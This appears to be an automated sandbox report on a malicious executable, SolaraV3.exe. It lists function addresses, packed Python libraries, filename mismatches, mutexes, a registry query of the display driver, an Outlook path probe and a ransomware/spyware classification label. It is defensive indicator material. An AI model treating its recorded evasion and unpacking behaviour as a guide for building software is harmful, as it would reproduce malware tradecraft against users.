Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82BD60	2_2_00007FFB0B82BD60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B943CC0	2_2_00007FFB0B943CC0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815A65	2_2_00007FFB0B815A65
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811CC6	2_2_00007FFB0B811CC6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B947480	2_2_00007FFB0B947480
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812D10	2_2_00007FFB0B812D10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813BA7	2_2_00007FFB0B813BA7
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812671	2_2_00007FFB0B812671
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812987	2_2_00007FFB0B812987
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B817257	2_2_00007FFB0B817257
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813837	2_2_00007FFB0B813837
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816EF1	2_2_00007FFB0B816EF1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B83B1C0	2_2_00007FFB0B83B1C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82F200	2_2_00007FFB0B82F200
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8150B0	2_2_00007FFB0B8150B0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81114F	2_2_00007FFB0B81114F
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9CB0E0	2_2_00007FFB0B9CB0E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8157D6	2_2_00007FFB0B8157D6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B947780	2_2_00007FFB0B947780
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81435E	2_2_00007FFB0B81435E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B87F700	2_2_00007FFB0B87F700
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813792	2_2_00007FFB0B813792
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81474B	2_2_00007FFB0B81474B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811B36	2_2_00007FFB0B811B36
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B83B550	2_2_00007FFB0B83B550
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35B360	2_2_00007FFB0C35B360
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35168B	2_2_00007FFB0C35168B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3520B3	2_2_00007FFB0C3520B3
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3B0B50	2_2_00007FFB0C3B0B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C356BA0	2_2_00007FFB0C356BA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C351537	2_2_00007FFB0C351537
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C351DD4	2_2_00007FFB0C351DD4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35195B	2_2_00007FFB0C35195B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3A0240	2_2_00007FFB0C3A0240
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3B8460	2_2_00007FFB0C3B8460
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C352572	2_2_00007FFB0C352572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAA9470FDD	14_2_00007FFAA9470FDD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9AE10	110_2_00007FF74EE9AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7ABA0	110_2_00007FF74EE7ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA7B24	110_2_00007FF74EEA7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE80A2C	110_2_00007FF74EE80A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE71884	110_2_00007FF74EE71884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7B540	110_2_00007FF74EE7B540
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE854C0	110_2_00007FF74EE854C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE81180	110_2_00007FF74EE81180
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE782F0	110_2_00007FF74EE782F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAC00C	110_2_00007FF74EEAC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB4FE8	110_2_00007FF74EEB4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDDFD8	110_2_00007FF74EEDDFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDAF90	110_2_00007FF74EEDAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA5F4C	110_2_00007FF74EEA5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE90104	110_2_00007FF74EE90104
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED00F0	110_2_00007FF74EED00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0074	110_2_00007FF74EEA0074
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9C05C	110_2_00007FF74EE9C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA8040	110_2_00007FF74EEA8040
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE83030	110_2_00007FF74EE83030
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7EE08	110_2_00007FF74EE7EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE81E04	110_2_00007FF74EE81E04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC1DCC	110_2_00007FF74EEC1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB9D74	110_2_00007FF74EEB9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0D20	110_2_00007FF74EEA0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAAF0C	110_2_00007FF74EEAAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE79EFC	110_2_00007FF74EE79EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBEEA4	110_2_00007FF74EEBEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7CE84	110_2_00007FF74EE7CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECFE74	110_2_00007FF74EECFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88E68	110_2_00007FF74EE88E68
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBAE50	110_2_00007FF74EEBAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC9B98	110_2_00007FF74EEC9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB4B38	110_2_00007FF74EEB4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE99D0C	110_2_00007FF74EE99D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC6D0C	110_2_00007FF74EEC6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7DD04	110_2_00007FF74EE7DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5C8C	110_2_00007FF74EEB5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88C30	110_2_00007FF74EE88C30
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB69FD	110_2_00007FF74EEB69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE749B8	110_2_00007FF74EE749B8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9D97C	110_2_00007FF74EE9D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAD91C	110_2_00007FF74EEAD91C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7CB14	110_2_00007FF74EE7CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDAAC0	110_2_00007FF74EEDAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5A70	110_2_00007FF74EEB5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAFA6C	110_2_00007FF74EEAFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE967E0	110_2_00007FF74EE967E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE817C8	110_2_00007FF74EE817C8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB190C	110_2_00007FF74EEB190C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0904	110_2_00007FF74EEA0904
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA38E8	110_2_00007FF74EEA38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC18A8	110_2_00007FF74EEC18A8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE82890	110_2_00007FF74EE82890
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE78884	110_2_00007FF74EE78884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC260C	110_2_00007FF74EEC260C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA65FC	110_2_00007FF74EEA65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9F5B0	110_2_00007FF74EE9F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88598	110_2_00007FF74EE88598
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAF59C	110_2_00007FF74EEAF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAA710	110_2_00007FF74EEAA710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB0710	110_2_00007FF74EEB0710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB2700	110_2_00007FF74EEB2700
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED86D4	110_2_00007FF74EED86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE886C4	110_2_00007FF74EE886C4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC7660	110_2_00007FF74EEC7660
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9C3E0	110_2_00007FF74EE9C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0374	110_2_00007FF74EEA0374
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE82360	110_2_00007FF74EE82360
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC832C	110_2_00007FF74EEC832C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7A504	110_2_00007FF74EE7A504
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5468	110_2_00007FF74EEB5468
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9D458	110_2_00007FF74EE9D458
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED41CC	110_2_00007FF74EED41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB81CC	110_2_00007FF74EEB81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB2164	110_2_00007FF74EEB2164
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC1314	110_2_00007FF74EEC1314
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE742E0	110_2_00007FF74EE742E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8D2C0	110_2_00007FF74EE8D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB02A4	110_2_00007FF74EEB02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC2268	110_2_00007FF74EEC2268
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7F24C	110_2_00007FF74EE7F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE97244	110_2_00007FF74EE97244
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C	110_2_00007FF74EE8E21C

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B8124BE appears 84 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B814840 appears 129 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FF6DC702710 appears 104 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B811EF6 appears 1581 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3512EE appears 293 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FF6DC702910 appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B812739 appears 516 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3BDFBF appears 88 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B814D6D appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B813012 appears 55 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81698D appears 49 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81688E appears 31 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3BE055 appears 63 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B812A09 appears 172 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81405C appears 780 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: String function: 00007FF74EE88444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: String function: 00007FF74EEB49F4 appears 53 times

PE / OLE file has an invalid certificate

Source: SolaraV3.exe

Static PE information: invalid certificate

PE file contains executable resources (Code or Archives)

Source: rar.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Sample file is different than original file name gathered from version info

Source: SolaraV3.exe	Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000000.1559321077.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe	Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052833376.00007FFB1AB18000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050822213.00007FFB0C43D000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051568182.00007FFB0C5EB000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053258667.00007FFB1BB2E000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050061158.00007FFB0BFE8000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython310.dll. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051838761.00007FFB0C613000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053545569.00007FFB1C267000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052222811.00007FFB18B84000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054325875.00007FFB1E4CC000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000000.1564954986.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053814093.00007FFB1C3C7000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054068816.00007FFB1E47C000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2047749339.00007FFB0B807000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051258231.00007FFB0C5B7000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Very long command line found

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
Source: libssl-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
Source: python310.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
Source: sqlite3.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9976026860367893
Source: unicodedata.pyd.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9937050102833638

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/58@4/3

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE8CAFC GetLastError,FormatMessageW,

110_2_00007FF74EE8CAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		110_2_00007FF74EE8EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		110_2_00007FF74EEBB57C

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE93144 GetDiskFreeSpaceExW,

110_2_00007FF74EE93144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
